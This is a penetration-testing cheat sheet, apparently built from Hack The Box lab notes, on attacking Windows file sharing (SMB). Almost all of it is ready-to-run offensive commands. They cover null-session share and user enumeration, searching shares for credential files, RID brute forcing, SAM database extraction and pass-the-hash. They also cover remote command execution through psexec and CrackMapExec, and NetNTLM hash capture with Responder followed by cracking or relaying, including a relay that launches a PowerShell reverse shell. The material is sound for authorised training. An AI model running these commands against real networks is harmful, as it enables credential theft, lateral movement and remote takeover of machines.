[139,445] SMB Enumeration
How to interact with SMB - GUI
we can press [WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\192.168.220.129\Finance\
⚠️ **Note:** Once you executed CrackMapExec If the`--exec-method` is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the `--exec-method` smbexec.
#List shared Folder
C:\htb> dir \\192.168.220.129\Finance\
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\
#Search for a specific word in the filename.
C:\htb>dir n:\*cred* /s /b
C:\htb>dir n:\*secret* /s /b
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred*
#Search for a specific word within the content of the files.
c:\htb> findstr /s /i cred n:\*.*
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred
#Download Files
smb: \> get file.txt
#Download recursive mode
smb: \Path\to\folder\> prompt off
smb: \Path\to\folder\> recurse true
smb: \Path\to\folder\> mget <folder>
#Execute commands without interrupt the connections
smb: \> !<command>
# See who, from which host, and which share the client is connected.
smb: \> smbstatus
#------------Windows------------
#Mount shared folder
C:\htb> net use n: \\192.168.220.129\Finance #/user:plaintext Password123
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"
#Mount SMB with creds
PS C:\htb> $username = 'intrusionz3r0'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred
#------------Linux------------
#sudo apt install cifs-utils.
Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
#intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
**CredentialFile:**
username=plaintext
password=Password123
domain=.
#-----------------------------
#Enmueration usign SMBClient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes
intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon"
# Auth by kerberos
#Export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k
#Nmap Scan
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445
#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128
#Enumeration using SMBmap
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
#Enumeration using CrackMapExec (targetting a non-domain joined computer use: --local-auth)
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p ''
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.11.222 --shares -u 'null' -p ''
#Enumeration using enum4linux
Intrusionz3r0X@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C
#Execute commands
#Note: If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.
Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
#Enumerate users
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
#Enumerate the logged on users through the network
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
#Extract SAM database
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
#Pass the hash
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
#Capture users' NetNTLM v1/v2 hashes.
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens33
Intrusionz3r0X@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
#If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx.
#First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c '<powershellreverseshellbase64>'Bruteforce
#Bruteforce
(Metasploit) use auxiliary/scanner/smb/smb_loginSMB Enumeration using RPCclient.
Intrusionz3r0X@htb[/htb]$ rpcclient -U "" 10.129.14.128
#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128Query
Description
srvinfo
Server information.
enumdomains
Enumerate all domains that are deployed in the network.
querydominfo
Provides domain, server, and user information of deployed domains.
netshareenumall
Enumerates all available shares.
netsharegetinfo <share>
Provides information about a specific share.
enumdomusers
Enumerates all domain users.
queryuser <RID>
Provides information about a specific user.
querygroup <RID>
Provides information about a specific group.